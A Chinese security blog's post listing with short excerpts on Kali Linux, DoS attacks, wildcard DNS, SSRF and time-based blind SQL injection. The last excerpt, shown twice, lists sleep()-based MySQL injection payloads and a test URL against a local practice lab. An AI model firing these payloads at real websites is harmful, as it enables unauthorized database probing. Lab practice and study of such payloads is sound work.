摘要:
kali-linux安装截图工具 阅读全文
posted @ 2018-05-28 10:17
Dgg大哥哥
阅读(431)
评论(0)
推荐(0)
摘要:
0x01 在说之前,先看一些例子吧 还有众所周知的中美黑客大战,新闻我就不说了 0x02 什么是DOS DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。 阅读全文
posted @ 2018-05-04 19:58
Dgg大哥哥
阅读(824)
评论(0)
推荐(0)
摘要:
所谓“泛域名解析”是指:利用通配符* (星号)来做次级域名以实现所有的次级域名均指向同一IP地址。 泛解析的用途1.可以让域名支持无限的子域名(这也是泛域名解析最大的用途)。2.防止用户错误输入导致的网站不能访问的问题3.可以让直接输入网址登陆网站的用户输入简洁的网址即可访问网站泛域名在实际使用中作 阅读全文
posted @ 2018-05-04 17:52
Dgg大哥哥
阅读(611)
评论(0)
推荐(0)
摘要:
SSRF漏洞是如何产生的?
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) 阅读全文
posted @ 2018-04-20 23:33
Dgg大哥哥
阅读(3513)
评论(1)
推荐(0)
摘要:
mysql注释 -- ,-- -,#,--+等
常用的判断语句:
' and if(1=0,1, sleep(10)) #
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
下面开始实验
这里我是知道数据库长度的,所以用的是等于=,实战中可以用大小于二分法来进行一个判断,缩短时间(或者丢sqlmap里)
1,输入检测语句
http://192.168.0.174/Less-9/?id=1'and if(1=0,1, sleep(4)) --+
sleep(4)是延迟4秒 --+是注释
按F12 -网络-右下角显示4秒后显示
阅读全文
mysql注释 -- ,-- -,#,--+等
常用的判断语句:
' and if(1=0,1, sleep(10)) #
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
下面开始实验
这里我是知道数据库长度的,所以用的是等于=,实战中可以用大小于二分法来进行一个判断,缩短时间(或者丢sqlmap里)
1,输入检测语句
http://192.168.0.174/Less-9/?id=1'and if(1=0,1, sleep(4)) --+
sleep(4)是延迟4秒 --+是注释
按F12 -网络-右下角显示4秒后显示
阅读全文
posted @ 2018-04-12 10:17
Dgg大哥哥
阅读(302)
评论(0)
推荐(0)
浙公网安备 33010602011771号